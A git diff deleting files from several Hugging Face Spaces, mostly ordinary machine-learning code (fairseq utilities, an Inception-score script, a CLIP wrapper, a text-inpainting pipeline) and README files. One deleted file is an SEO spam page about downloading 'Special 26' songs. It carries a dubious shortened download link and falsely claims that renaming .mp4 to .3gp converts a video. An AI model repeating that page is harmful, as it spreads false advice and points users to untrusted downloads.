f71fe4ef8129b9a1dc21b3a66f5c8defccfa7e6c..0000000000000000000000000000000000000000 --- a/spaces/mrtimmydontplay/api/README.md +++ /dev/null @@ -1,20 +0,0 @@ ---- -title: Shiny for Python template -emoji: 🌍 -colorFrom: yellow -colorTo: indigo -sdk: docker -pinned: false -license: other -duplicated_from: posit/shiny-for-python-template ---- - -This is a templated Space for [Shiny for Python](https://shiny.rstudio.com/py/). - -To get started with a new app do the following: - -1) Install Shiny with `pip install shiny` -2) Create a new app with `shiny create .` -3) Then run the app with `shiny run --reload` - -To learn more about this framework please see the [Documentation](https://shiny.rstudio.com/py/docs/overview.html). diff --git a/spaces/mshukor/UnIVAL/fairseq/examples/hubert/simple_kmeans/feature_utils.py b/spaces/mshukor/UnIVAL/fairseq/examples/hubert/simple_kmeans/feature_utils.py deleted file mode 100644 index f80bc4569768fac181133cdc8f76d1230e03bff6..0000000000000000000000000000000000000000 --- a/spaces/mshukor/UnIVAL/fairseq/examples/hubert/simple_kmeans/feature_utils.py +++ /dev/null @@ -1,66 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -# -# This source code is licensed under the MIT license found in the -# LICENSE file in the root directory of this source tree. - -import logging -import os -import sys - -import tqdm -from npy_append_array import NpyAppendArray - - -logging.basicConfig( - format="%(asctime)s | %(levelname)s | %(name)s | %(message)s", - datefmt="%Y-%m-%d %H:%M:%S", - level=os.environ.get("LOGLEVEL", "INFO").upper(), - stream=sys.stdout, -) -logger = logging.getLogger("feature_utils") - - -def get_shard_range(tot, nshard, rank): - assert rank < nshard and rank >= 0, f"invaid rank/nshard {rank}/{nshard}" - start = round(tot / nshard * rank) - end = round(tot / nshard * (rank + 1)) - assert start < end, f"start={start}, end={end}" - logger.info( - f"rank {rank} of {nshard}, process {end-start} " - f"({start}-{end}) out of {tot}" - ) - return start, end - - -def get_path_iterator(tsv, nshard, rank): - with open(tsv, "r") as f: - root = f.readline().rstrip() - lines = [line.rstrip() for line in f] - start, end = get_shard_range(len(lines), nshard, rank) - lines = lines[start:end] - def iterate(): - for line in lines: - subpath, nsample = line.split("\t") - yield f"{root}/{subpath}", int(nsample) - return iterate, len(lines) - - -def dump_feature(reader, generator, num, split, nshard, rank, feat_dir): - iterator = generator() - - feat_path = f"{feat_dir}/{split}_{rank}_{nshard}.npy" - leng_path = f"{feat_dir}/{split}_{rank}_{nshard}.len" - - os.makedirs(feat_dir, exist_ok=True) - if os.path.exists(feat_path): - os.remove(feat_path) - - feat_f = NpyAppendArray(feat_path) - with open(leng_path, "w") as leng_f: - for path, nsample in tqdm.tqdm(iterator, total=num): - feat = reader.get_feats(path, nsample) - feat_f.append(feat.cpu().numpy()) - leng_f.write(f"{len(feat)}\n") - logger.info("finished successfully") - - diff --git a/spaces/mshukor/UnIVAL/fairseq/examples/wav2vec/unsupervised/data/__init__.py b/spaces/mshukor/UnIVAL/fairseq/examples/wav2vec/unsupervised/data/__init__.py deleted file mode 100644 index d0545627efc9a6f9bb180e351ead519a2cb6dea7..0000000000000000000000000000000000000000 --- a/spaces/mshukor/UnIVAL/fairseq/examples/wav2vec/unsupervised/data/__init__.py +++ /dev/null @@ -1,13 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -# -# This source code is licensed under the MIT license found in the -# LICENSE file in the root directory of this source tree. - -from .extracted_features_dataset import ExtractedFeaturesDataset -from .random_input_dataset import RandomInputDataset - - -__all__ = [ - "ExtractedFeaturesDataset", - "RandomInputDataset", -] diff --git a/spaces/mshukor/UnIVAL/fairseq/fairseq/data/encoders/__init__.py b/spaces/mshukor/UnIVAL/fairseq/fairseq/data/encoders/__init__.py deleted file mode 100644 index 7cbe00a10520331709441e5e77991bd2edca8c06..0000000000000000000000000000000000000000 --- a/spaces/mshukor/UnIVAL/fairseq/fairseq/data/encoders/__init__.py +++ /dev/null @@ -1,29 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -# -# This source code is licensed under the MIT license found in the -# LICENSE file in the root directory of this source tree. - - -import importlib -import os - -from fairseq import registry - - -build_tokenizer, register_tokenizer, TOKENIZER_REGISTRY, _ = registry.setup_registry( - "--tokenizer", - default=None, -) - - -build_bpe, register_bpe, BPE_REGISTRY, _ = registry.setup_registry( - "--bpe", - default=None, -) - - -# automatically import any Python files in the encoders/ directory -for file in sorted(os.listdir(os.path.dirname(__file__))): - if file.endswith(".py") and not file.startswith("_"): - module = file[: file.find(".py")] - importlib.import_module("fairseq.data.encoders." + module) diff --git a/spaces/mshukor/UnIVAL/run_scripts/image_gen/inception_score.py b/spaces/mshukor/UnIVAL/run_scripts/image_gen/inception_score.py deleted file mode 100644 index 3883593c38f5531dcf5626b8a6ac69027899d4ce..0000000000000000000000000000000000000000 --- a/spaces/mshukor/UnIVAL/run_scripts/image_gen/inception_score.py +++ /dev/null @@ -1,107 +0,0 @@ -import os -from argparse import ArgumentParser, ArgumentDefaultsHelpFormatter - -import numpy as np -import torch -import torch.nn as nn -import torch.nn.functional as F -import torch.utils.data -import torchvision.transforms as transforms -from torchvision.models.inception import inception_v3, Inception_V3_Weights -from scipy.stats import entropy -from torch.autograd import Variable -from eval_utils.dataset import Dataset -from eval_utils.inceptionV3 import InceptionV3 - -parser = ArgumentParser(formatter_class=ArgumentDefaultsHelpFormatter) -parser.add_argument('--batch-size', type=int, default=64, - help='Batch size to use') -parser.add_argument('--dims', type=int, default=2048, - choices=list(InceptionV3.BLOCK_INDEX_BY_DIM), - help=('Dimensionality of Inception features to use. ' - 'By default, uses pool3 features')) -parser.add_argument('-c', '--gpu', default='', type=str, - help='GPU to use (leave blank for CPU only)') -parser.add_argument('--path1', type=str, help='path to images') - - -def inception_score(imgs, cuda=True, batch_size=32, resize=False, splits=1): - """Computes the inception score of the generated images imgs - imgs -- Torch dataset of (3xHxW) numpy images normalized in the range [-1, 1] - cuda -- whether or not to run on GPU - batch_size -- batch size for feeding into Inception v3 - splits -- number of splits - """ - N = len(imgs) - - os.environ['TORCH_HOME']= '/lus/home/NAT/gda2204/mshukor/.cache/torch' - - assert batch_size > 0 - if batch_size > N: - batch_size = N - - # Set up dtype - if cuda: - dtype = torch.cuda.FloatTensor - else: - if torch.cuda.is_available(): - print("WARNING: You have a CUDA device, so you should probably set cuda=True") - dtype = torch.FloatTensor - - # Set up dataloader - dataloader = torch.utils.data.DataLoader(imgs, batch_size=batch_size) - - # Load inception model - print("Load inception model") - inception_model = inception_v3(transform_input=False).type(dtype) - checkpoint = torch.load("/lus/home/NAT/gda2204/mshukor/.cache/torch/hub/checkpoints/inception_v3_google-0cc3c7bd.pth") - - # print(checkpoint.keys()) - inception_model.load_state_dict(checkpoint) - inception_model.eval() - up = nn.Upsample(size=(299, 299), mode='bilinear').type(dtype) - - def get_pred(x): - if resize: - x = up(x) - x = inception_model(x) - return F.softmax(x).data.cpu().numpy() - - # Get predictions - preds = np.zeros((N, 1000)) - - for i, batch in enumerate(dataloader, 0): - batch = batch.type(dtype) - batchv = Variable(batch) - batch_size_i = batch.size()[0] - - preds[i * batch_size:i * batch_size + batch_size_i] = get_pred(batchv) - - # Now compute the mean kl-div - split_scores = [] - - for k in range(splits): - part = preds[k * (N // splits): (k + 1) * (N // splits), :] - py = np.mean(part, axis=0) - scores = [] - for i in range(part.shape[0]): - pyx = part[i, :] - scores.append(entropy(pyx, py)) - split_scores.append(np.exp(np.mean(scores))) - - return np.mean(split_scores), np.std(split_scores) - - -if __name__ == '__main__': - - - args = parser.parse_args() - os.environ['CUDA_VISIBLE_DEVICES'] = args.gpu - - dataset = Dataset(args.path1, transforms.Compose([ - transforms.Resize((299, 299)), - transforms.ToTensor(), - ])) - mean, std = inception_score(dataset, cuda=True, batch_size=32, resize=False, splits=1) - print('IS mean: ', mean) - print('IS std: ', std) diff --git a/spaces/mumiao/BingAI/README.md b/spaces/mumiao/BingAI/README.md deleted file mode 100644 index d8cafb766bb1249421dbcabb2fec8dd5e91962cb..0000000000000000000000000000000000000000 --- a/spaces/mumiao/BingAI/README.md +++ /dev/null @@ -1,12 +0,0 @@ ---- -title: BingAI -emoji: 🌖 -colorFrom: purple -colorTo: yellow -sdk: docker -pinned: false -license: mit -app_port: 8080 ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/ncoop57/clifs/clip.py b/spaces/ncoop57/clifs/clip.py deleted file mode 100644 index f362aa6a0a69e8b590f6190c9243c83322659e26..0000000000000000000000000000000000000000 --- a/spaces/ncoop57/clifs/clip.py +++ /dev/null @@ -1,80 +0,0 @@ -from torch import nn -import transformers -import torch -from PIL import Image - - -class CLIPModel(nn.Module): - def __init__(self, model_name: str = "openai/clip-vit-base-patch32", processor_name=None): - super(CLIPModel, self).__init__() - - if processor_name is None: - processor_name = model_name - - self.model = transformers.CLIPModel.from_pretrained(model_name) - self.processor = transformers.CLIPProcessor.from_pretrained(processor_name) - - def __repr__(self): - return "CLIPModel()" - - def forward(self, features): - image_embeds = [] - text_embeds = [] - - if 'pixel_values' in features: - vision_outputs = self.model.vision_model(pixel_values=features['pixel_values']) - image_embeds = self.model.visual_projection(vision_outputs[1]) - - if 'input_ids' in features: - text_outputs = self.model.text_model( - input_ids=features.get('input_ids'), - attention_mask=features.get('attention_mask', None), - position_ids=features.get('position_ids', None), - output_attentions=features.get('output_attentions', None), - output_hidden_states=features.get('output_hidden_states', None), - ) - text_embeds = self.model.text_projection(text_outputs[1]) - - sentence_embedding = [] - image_features = iter(image_embeds) - text_features = iter(text_embeds) - - for idx, input_type in enumerate(features['image_text_info']): - if input_type == 0: - sentence_embedding.append(next(image_features)) - else: - sentence_embedding.append(next(text_features)) - - features['sentence_embedding'] = torch.stack(sentence_embedding).float() - - return features - - def tokenize(self, texts): - images = [] - texts_values = [] - image_text_info = [] - - for idx, data in enumerate(texts): - if isinstance(data, Image.Image): # An Image - images.append(data) - image_text_info.append(0) - else: # A text - texts_values.append(data) - image_text_info.append(1) - - if len(texts_values) == 0: - texts_values = None - if len(images) == 0: - images = None - - inputs = self.processor(text=texts_values, images=images, return_tensors="pt", padding=True) - inputs['image_text_info'] = image_text_info - return inputs - - def save(self, output_path: str): - self.model.save_pretrained(output_path) - self.processor.save_pretrained(output_path) - - @staticmethod - def load(input_path: str): - return CLIPModel(model_name=input_path) diff --git a/spaces/netiMophi/DreamlikeArt-Diffusion-1.0/Special 26 Movie 3gp Video Songs Download _HOT_.md b/spaces/netiMophi/DreamlikeArt-Diffusion-1.0/Special 26 Movie 3gp Video Songs Download _HOT_.md deleted file mode 100644 index 1aae7dac107382ee80ad5242dd43b73530e99026..0000000000000000000000000000000000000000 --- a/spaces/netiMophi/DreamlikeArt-Diffusion-1.0/Special 26 Movie 3gp Video Songs Download _HOT_.md +++ /dev/null @@ -1,19 +0,0 @@ -
    -

    How to Download Special 26 Movie 3GP Video Songs

    -

    Special 26 is a 2013 Bollywood thriller film starring Akshay Kumar, Kajal Aggarwal, Anupam Kher and Manoj Bajpayee. The film is based on the 1987 Opera House heist where a group of con-men posed as CBI officers and raided a jewellery store. The film has some catchy songs composed by M.M. Kreem and sung by various artists. If you want to download the video songs of Special 26 in 3GP format for your mobile phone, here are some steps you can follow:

    -
      -
    1. Go to this website that has the video songs of Special 26 in HD quality[^2^]. You can choose from four songs: Gore Mukhde Pe Zulfen, Mujh Mein Tu, Mujh Mein Tu ft. Akshay Kumar and Kaun Mera.
    2. -
    3. Click on the song you want to download and you will be redirected to another page where you can see the video player and some download options.
    4. -
    5. Right-click on the video player and select "Save video as" from the menu. You will see a pop-up window where you can choose the location and name of the file.
    6. -
    7. Before clicking on "Save", change the file extension from .mp4 to .3gp in the file name. For example, if the file name is "Gore Mukhde Pe Zulfen - Special 26.mp4", change it to "Gore Mukhde Pe Zulfen - Special 26.3gp". This will convert the video format from MP4 to 3GP.
    8. -
    9. Click on "Save" and wait for the download to complete. You can repeat the same steps for other songs you want to download.
    10. -
    -

    You can also watch the video songs of Special 26 on YouTube[^1^] or listen to them on Bollywood Hungama[^3^]. Enjoy!

    -

    Special 26 movie 3gp video songs download


    Download Zip >>> https://urlcod.com/2uIckx



    - -

    Special 26 is a critically acclaimed film that received positive reviews from both critics and audiences. The film was praised for its gripping plot, realistic portrayal of the 1980s era, and stellar performances by the cast. The film was also a commercial success, earning over ₹100 crore at the box office. The film was nominated for several awards, including Best Film, Best Director, Best Actor and Best Supporting Actor at the 59th Filmfare Awards.

    -

    The songs of Special 26 are also popular among the fans of the film. The songs are composed by M.M. Kreem, who is known for his melodious and soulful music. The lyrics are written by Irshad Kamil, who has penned some of the most memorable songs in Bollywood. The songs are sung by various singers, such as Keerthi Sagathia, M.M. Kreem, Shreya Ghoshal, Chaitra Ambadipudi and Papon. The songs range from romantic to patriotic to inspirational, and suit the mood and theme of the film.

    -

    If you are a fan of Special 26 and its songs, you can download them in 3GP format for your mobile phone by following the steps mentioned above. You can also watch them online or listen to them on music streaming platforms. You can also share them with your friends and family who love the film and its music. Special 26 is a film that will keep you entertained and engaged till the end.

    -

    e93f5a0c3f
    -
    -
    \ No newline at end of file diff --git a/spaces/nomic-ai/mosaicml_dolly_hhrlhf/index.html b/spaces/nomic-ai/mosaicml_dolly_hhrlhf/index.html deleted file mode 100644 index b09ce9d92fa9f8dd1d06a26563b242a4ad12b455..0000000000000000000000000000000000000000 --- a/spaces/nomic-ai/mosaicml_dolly_hhrlhf/index.html +++ /dev/null @@ -1,42 +0,0 @@ - - - - mosaicml/dolly_hhrlhf - - - - -
    - -
    - - - \ No newline at end of file diff --git a/spaces/nomic-ai/neulab_conala/README.md b/spaces/nomic-ai/neulab_conala/README.md deleted file mode 100644 index 2e4306dd81480a3dba23d9766d9039b4836a712f..0000000000000000000000000000000000000000 --- a/spaces/nomic-ai/neulab_conala/README.md +++ /dev/null @@ -1,8 +0,0 @@ ---- -title: neulab/conala -emoji: 🗺️ -colorFrom: purple -colorTo: red -sdk: static -pinned: false ---- diff --git a/spaces/osanseviero/danfojs-test/README.md b/spaces/osanseviero/danfojs-test/README.md deleted file mode 100644 index b5cae726ec3a0b59ed0a284a5435d52598fccb79..0000000000000000000000000000000000000000 --- a/spaces/osanseviero/danfojs-test/README.md +++ /dev/null @@ -1,36 +0,0 @@ ---- -title: Danfojs Test -emoji: 👁 -colorFrom: indigo -colorTo: green -sdk: static -pinned: false ---- - -# Configuration - -`title`: _string_ -Display title for the Space - -`emoji`: _string_ -Space emoji (emoji-only character allowed) - -`colorFrom`: _string_ -Color for Thumbnail gradient (red, yellow, green, blue, indigo, purple, pink, gray) - -`colorTo`: _string_ -Color for Thumbnail gradient (red, yellow, green, blue, indigo, purple, pink, gray) - -`sdk`: _string_ -Can be either `gradio`, `streamlit`, or `static` - -`sdk_version` : _string_ -Only applicable for `streamlit` SDK. -See [doc](https://hf.co/docs/hub/spaces) for more info on supported versions. - -`app_file`: _string_ -Path to your main application file (which contains either `gradio` or `streamlit` Python code, or `static` html code). -Path is relative to the root of the repository. - -`pinned`: _boolean_ -Whether the Space stays on top of your list. diff --git a/spaces/pablodawson/ldm3d-inpainting/diffuserslocal/examples/community/text_inpainting.py b/spaces/pablodawson/ldm3d-inpainting/diffuserslocal/examples/community/text_inpainting.py deleted file mode 100644 index 99a488788a0de6db78ae7c2c89038565efd29551..0000000000000000000000000000000000000000 --- a/spaces/pablodawson/ldm3d-inpainting/diffuserslocal/examples/community/text_inpainting.py +++ /dev/null @@ -1,302 +0,0 @@ -from typing import Callable, List, Optional, Union - -import PIL -import torch -from transformers import ( - CLIPImageProcessor, - CLIPSegForImageSegmentation, - CLIPSegProcessor, - CLIPTextModel, - CLIPTokenizer, -) - -from diffusers import DiffusionPipeline -from diffusers.configuration_utils import FrozenDict -from diffusers.models import AutoencoderKL, UNet2DConditionModel -from diffusers.pipelines.stable_diffusion import StableDiffusionInpaintPipeline -from diffusers.pipelines.stable_diffusion.safety_checker import StableDiffusionSafetyChecker -from diffusers.schedulers import DDIMScheduler, LMSDiscreteScheduler, PNDMScheduler -from diffusers.utils import deprecate, is_accelerate_available, logging - - -logger = logging.get_logger(__name__) # pylint: disable=invalid-name - - -class TextInpainting(DiffusionPipeline): - r""" - Pipeline for text based inpainting using Stable Diffusion. - Uses CLIPSeg to get a mask from the given text, then calls the Inpainting pipeline with the generated mask - - This model inherits from [`DiffusionPipeline`]. Check the superclass documentation for the generic methods the - library implements for all the pipelines (such as downloading or saving, running on a particular device, etc.) - - Args: - segmentation_model ([`CLIPSegForImageSegmentation`]): - CLIPSeg Model to generate mask from the given text. Please refer to the [model card]() for details. - segmentation_processor ([`CLIPSegProcessor`]): - CLIPSeg processor to get image, text features to translate prompt to English, if necessary. Please refer to the - [model card](https://huggingface.co/docs/transformers/model_doc/clipseg) for details. - vae ([`AutoencoderKL`]): - Variational Auto-Encoder (VAE) Model to encode and decode images to and from latent representations. - text_encoder ([`CLIPTextModel`]): - Frozen text-encoder. Stable Diffusion uses the text portion of - [CLIP](https://huggingface.co/docs/transformers/model_doc/clip#transformers.CLIPTextModel), specifically - the [clip-vit-large-patch14](https://huggingface.co/openai/clip-vit-large-patch14) variant. - tokenizer (`CLIPTokenizer`): - Tokenizer of class - [CLIPTokenizer](https://huggingface.co/docs/transformers/v4.21.0/en/model_doc/clip#transformers.CLIPTokenizer). - unet ([`UNet2DConditionModel`]): Conditional U-Net architecture to denoise the encoded image latents. - scheduler ([`SchedulerMixin`]): - A scheduler to be used in combination with `unet` to denoise the encoded image latens. Can be one of - [`DDIMScheduler`], [`LMSDiscreteScheduler`], or [`PNDMScheduler`]. - safety_checker ([`StableDiffusionSafetyChecker`]): - Classification module that estimates whether generated images could be considered offensive or harmful. - Please, refer to the [model card](https://huggingface.co/runwayml/stable-diffusion-v1-5) for details. - feature_extractor ([`CLIPImageProcessor`]): - Model that extracts features from generated images to be used as inputs for the `safety_checker`. - """ - - def __init__( - self, - segmentation_model: CLIPSegForImageSegmentation, - segmentation_processor: CLIPSegProcessor, - vae: AutoencoderKL, - text_encoder: CLIPTextModel, - tokenizer: CLIPTokenizer, - unet: UNet2DConditionModel, - scheduler: Union[DDIMScheduler, PNDMScheduler, LMSDiscreteScheduler], - safety_checker: StableDiffusionSafetyChecker, - feature_extractor: CLIPImageProcessor, - ): - super().__init__() - - if hasattr(scheduler.config, "steps_offset") and scheduler.config.steps_offset != 1: - deprecation_message = ( - f"The configuration file of this scheduler: {scheduler} is outdated. `steps_offset`" - f" should be set to 1 instead of {scheduler.config.steps_offset}. Please make sure " - "to update the config accordingly as leaving `steps_offset` might led to incorrect results" - " in future versions. If you have downloaded this checkpoint from the Hugging Face Hub," - " it would be very nice if you could open a Pull request for the `scheduler/scheduler_config.json`" - " file" - ) - deprecate("steps_offset!=1", "1.0.0", deprecation_message, standard_warn=False) - new_config = dict(scheduler.config) - new_config["steps_offset"] = 1 - scheduler._internal_dict = FrozenDict(new_config) - - if hasattr(scheduler.config, "skip_prk_steps") and scheduler.config.skip_prk_steps is False: - deprecation_message = ( - f"The configuration file of this scheduler: {scheduler} has not set the configuration" - " `skip_prk_steps`. `skip_prk_steps` should be set to True in the configuration file. Please make" - " sure to update the config accordingly as not setting `skip_prk_steps` in the config might lead to" - " incorrect results in future versions. If you have downloaded this checkpoint from the Hugging Face" - " Hub, it would be very nice if you could open a Pull request for the" - " `scheduler/scheduler_config.json` file" - ) - deprecate("skip_prk_steps not set", "1.0.0", deprecation_message, standard_warn=False) - new_config = dict(scheduler.config) - new_config["skip_prk_steps"] = True - scheduler._internal_dict = FrozenDict(new_config) - - if safety_checker is None: - logger.warning( - f"You have disabled the safety checker for {self.__class__} by passing `safety_checker=None`. Ensure" - " that you abide to the conditions of the Stable Diffusion license and do not expose unfiltered" - " results in services or applications open to the public. Both the diffusers team and Hugging Face" - " strongly recommend to keep the safety filter enabled in all public facing circumstances, disabling" - " it only for use-cases that involve analyzing network behavior or auditing its results. For more" - " information, please have a look at https://github.com/huggingface/diffusers/pull/254 ." - ) - - self.register_modules( - segmentation_model=segmentation_model, - segmentation_processor=segmentation_processor, - vae=vae, - text_encoder=text_encoder, - tokenizer=tokenizer, - unet=unet, - scheduler=scheduler, - safety_checker=safety_checker, - feature_extractor=feature_extractor, - ) - - def enable_attention_slicing(self, slice_size: Optional[Union[str, int]] = "auto"): - r""" - Enable sliced attention computation. - - When this option is enabled, the attention module will split the input tensor in slices, to compute attention - in several steps. This is useful to save some memory in exchange for a small speed decrease. - - Args: - slice_size (`str` or `int`, *optional*, defaults to `"auto"`): - When `"auto"`, halves the input to the attention heads, so attention will be computed in two steps. If - a number is provided, uses as many slices as `attention_head_dim // slice_size`. In this case, - `attention_head_dim` must be a multiple of `slice_size`. - """ - if slice_size == "auto": - # half the attention head size is usually a good trade-off between - # speed and memory - slice_size = self.unet.config.attention_head_dim // 2 - self.unet.set_attention_slice(slice_size) - - def disable_attention_slicing(self): - r""" - Disable sliced attention computation. If `enable_attention_slicing` was previously invoked, this method will go - back to computing attention in one step. - """ - # set slice_size = `None` to disable `attention slicing` - self.enable_attention_slicing(None) - - def enable_sequential_cpu_offload(self): - r""" - Offloads all models to CPU using accelerate, significantly reducing memory usage. When called, unet, - text_encoder, vae and safety checker have their state dicts saved to CPU and then are moved to a - `torch.device('meta') and loaded to GPU only when their specific submodule has its `forward` method called. - """ - if is_accelerate_available(): - from accelerate import cpu_offload - else: - raise ImportError("Please install accelerate via `pip install accelerate`") - - device = torch.device("cuda") - - for cpu_offloaded_model in [self.unet, self.text_encoder, self.vae, self.safety_checker]: - if cpu_offloaded_model is not None: - cpu_offload(cpu_offloaded_model, device) - - @property - # Copied from diffusers.pipelines.stable_diffusion.pipeline_stable_diffusion.StableDiffusionPipeline._execution_device - def _execution_device(self): - r""" - Returns the device on which the pipeline's models will be executed. After calling - `pipeline.enable_sequential_cpu_offload()` the execution device can only be inferred from Accelerate's module - hooks. - """ - if self.device != torch.device("meta") or not hasattr(self.unet, "_hf_hook"): - return self.device - for module in self.unet.modules(): - if ( - hasattr(module, "_hf_hook") - and hasattr(module._hf_hook, "execution_device") - and module._hf_hook.execution_device is not None - ): - return torch.device(module._hf_hook.execution_device) - return self.device - - @torch.no_grad() - def __call__( - self, - prompt: Union[str, List[str]], - image: Union[torch.FloatTensor, PIL.Image.Image], - text: str, - height: int = 512, - width: int = 512, - num_inference_steps: int = 50, - guidance_scale: float = 7.5, - negative_prompt: Optional[Union[str, List[str]]] = None, - num_images_per_prompt: Optional[int] = 1, - eta: float = 0.0, - generator: Optional[torch.Generator] = None, - latents: Optional[torch.FloatTensor] = None, - output_type: Optional[str] = "pil", - return_dict: bool = True, - callback: Optional[Callable[[int, int, torch.FloatTensor], None]] = None, - callback_steps: int = 1, - **kwargs, - ): - r""" - Function invoked when calling the pipeline for generation. - - Args: - prompt (`str` or `List[str]`): - The prompt or prompts to guide the image generation. - image (`PIL.Image.Image`): - `Image`, or tensor representing an image batch which will be inpainted, *i.e.* parts of the image will - be masked out with `mask_image` and repainted according to `prompt`. - text (`str``): - The text to use to generate the mask. - height (`int`, *optional*, defaults to 512): - The height in pixels of the generated image. - width (`int`, *optional*, defaults to 512): - The width in pixels of the generated image. - num_inference_steps (`int`, *optional*, defaults to 50): - The number of denoising steps. More denoising steps usually lead to a higher quality image at the - expense of slower inference. - guidance_scale (`float`, *optional*, defaults to 7.5): - Guidance scale as defined in [Classifier-Free Diffusion Guidance](https://arxiv.org/abs/2207.12598). - `guidance_scale` is defined as `w` of equation 2. of [Imagen - Paper](https://arxiv.org/pdf/2205.11487.pdf). Guidance scale is enabled by setting `guidance_scale > - 1`. Higher guidance scale encourages to generate images that are closely linked to the text `prompt`, - usually at the expense of lower image quality. - negative_prompt (`str` or `List[str]`, *optional*): - The prompt or prompts not to guide the image generation. Ignored when not using guidance (i.e., ignored - if `guidance_scale` is less than `1`). - num_images_per_prompt (`int`, *optional*, defaults to 1): - The number of images to generate per prompt. - eta (`float`, *optional*, defaults to 0.0): - Corresponds to parameter eta (η) in the DDIM paper: https://arxiv.org/abs/2010.02502. Only applies to - [`schedulers.DDIMScheduler`], will be ignored for others. - generator (`torch.Generator`, *optional*): - A [torch generator](https://pytorch.org/docs/stable/generated/torch.Generator.html) to make generation - deterministic. - latents (`torch.FloatTensor`, *optional*): - Pre-generated noisy latents, sampled from a Gaussian distribution, to be used as inputs for image - generation. Can be used to tweak the same generation with different prompts. If not provided, a latents - tensor will ge generated by sampling using the supplied random `generator`. - output_type (`str`, *optional*, defaults to `"pil"`): - The output format of the generate image. Choose between - [PIL](https://pillow.readthedocs.io/en/stable/): `PIL.Image.Image` or `np.array`. - return_dict (`bool`, *optional*, defaults to `True`): - Whether or not to return a [`~pipelines.stable_diffusion.StableDiffusionPipelineOutput`] instead of a - plain tuple. - callback (`Callable`, *optional*): - A function that will be called every `callback_steps` steps during inference. The function will be - called with the following arguments: `callback(step: int, timestep: int, latents: torch.FloatTensor)`. - callback_steps (`int`, *optional*, defaults to 1): - The frequency at which the `callback` function will be called. If not specified, the callback will be - called at every step. - - Returns: - [`~pipelines.stable_diffusion.StableDiffusionPipelineOutput`] or `tuple`: - [`~pipelines.stable_diffusion.StableDiffusionPipelineOutput`] if `return_dict` is True, otherwise a `tuple. - When returning a tuple, the first element is a list with the generated images, and the second element is a - list of `bool`s denoting whether the corresponding generated image likely represents "not-safe-for-work" - (nsfw) content, according to the `safety_checker`. - """ - - # We use the input text to generate the mask - inputs = self.segmentation_processor( - text=[text], images=[image], padding="max_length", return_tensors="pt" - ).to(self.device) - outputs = self.segmentation_model(**inputs) - mask = torch.sigmoid(outputs.logits).cpu().detach().unsqueeze(-1).numpy() - mask_pil = self.numpy_to_pil(mask)[0].resize(image.size) - - # Run inpainting pipeline with the generated mask - inpainting_pipeline = StableDiffusionInpaintPipeline( - vae=self.vae, - text_encoder=self.text_encoder, - tokenizer=self.tokenizer, - unet=self.unet, - scheduler=self.scheduler, - safety_checker=self.safety_checker, - feature_extractor=self.feature_extractor, - ) - return inpainting_pipeline( - prompt=prompt, - image=image, - mask_image=mask_pil, - height=height, - width=width, - num_inference_steps=num_inference_steps, - guidance_scale=guidance_scale, - negative_prompt=negative_prompt, - num_images_per_prompt=num_images_per_prompt, - eta=eta, - generator=generator, - latents=latents, - output_type=output_type, - return_dict=return_dict, - callback=callback, - callback_steps=callback_steps, - ) diff --git a/spaces/pablodawson/ldm3d-inpainting/diffuserslocal/scripts/convert_music_spectrogram_to_diffusers.py b/spaces/pablodawson/ldm3d-inpainting/diffuserslocal/scripts/convert_music_spectrogram_to_diffusers.py deleted file mode 100644 index 41ee8b914774de09193f866c406057a92744bf51..0000000000000000000000000000000000000000 --- a/spaces/pablodawson/ldm3d-inpainting/diffuserslocal/scripts/convert_music_spectrogram_to_diffusers.py +++ /dev/null @@ -1,213 +0,0 @@ -#!/usr/bin/env python3 -import argparse -import os - -import jax as jnp -import numpy as onp -import torch -import torch.nn as nn -from music_spectrogram_diffusion import inference -from t5x import checkpoints - -from diffusers import DDPMScheduler, OnnxRuntimeModel, SpectrogramDiffusionPipeline -from diffusers.pipelines.spectrogram_diffusion import SpectrogramContEncoder, SpectrogramNotesEncoder, T5FilmDecoder - - -MODEL = "base_with_context" - - -def load_notes_encoder(weights, model): - model.token_embedder.weight = nn.Parameter(torch.FloatTensor(weights["token_embedder"]["embedding"])) - model.position_encoding.weight = nn.Parameter( - torch.FloatTensor(weights["Embed_0"]["embedding"]), requires_grad=False - ) - for lyr_num, lyr in enumerate(model.encoders): - ly_weight = weights[f"layers_{lyr_num}"] - lyr.layer[0].layer_norm.weight = nn.Parameter( - torch.FloatTensor(ly_weight["pre_attention_layer_norm"]["scale"]) - ) - - attention_weights = ly_weight["attention"] - lyr.layer[0].SelfAttention.q.weight = nn.Parameter(torch.FloatTensor(attention_weights["query"]["kernel"].T)) - lyr.layer[0].SelfAttention.k.weight = nn.Parameter(torch.FloatTensor(attention_weights["key"]["kernel"].T)) - lyr.layer[0].SelfAttention.v.weight = nn.Parameter(torch.FloatTensor(attention_weights["value"]["kernel"].T)) - lyr.layer[0].SelfAttention.o.weight = nn.Parameter(torch.FloatTensor(attention_weights["out"]["kernel"].T)) - - lyr.layer[1].layer_norm.weight = nn.Parameter(torch.FloatTensor(ly_weight["pre_mlp_layer_norm"]["scale"])) - - lyr.layer[1].DenseReluDense.wi_0.weight = nn.Parameter(torch.FloatTensor(ly_weight["mlp"]["wi_0"]["kernel"].T)) - lyr.layer[1].DenseReluDense.wi_1.weight = nn.Parameter(torch.FloatTensor(ly_weight["mlp"]["wi_1"]["kernel"].T)) - lyr.layer[1].DenseReluDense.wo.weight = nn.Parameter(torch.FloatTensor(ly_weight["mlp"]["wo"]["kernel"].T)) - - model.layer_norm.weight = nn.Parameter(torch.FloatTensor(weights["encoder_norm"]["scale"])) - return model - - -def load_continuous_encoder(weights, model): - model.input_proj.weight = nn.Parameter(torch.FloatTensor(weights["input_proj"]["kernel"].T)) - - model.position_encoding.weight = nn.Parameter( - torch.FloatTensor(weights["Embed_0"]["embedding"]), requires_grad=False - ) - - for lyr_num, lyr in enumerate(model.encoders): - ly_weight = weights[f"layers_{lyr_num}"] - attention_weights = ly_weight["attention"] - - lyr.layer[0].SelfAttention.q.weight = nn.Parameter(torch.FloatTensor(attention_weights["query"]["kernel"].T)) - lyr.layer[0].SelfAttention.k.weight = nn.Parameter(torch.FloatTensor(attention_weights["key"]["kernel"].T)) - lyr.layer[0].SelfAttention.v.weight = nn.Parameter(torch.FloatTensor(attention_weights["value"]["kernel"].T)) - lyr.layer[0].SelfAttention.o.weight = nn.Parameter(torch.FloatTensor(attention_weights["out"]["kernel"].T)) - lyr.layer[0].layer_norm.weight = nn.Parameter( - 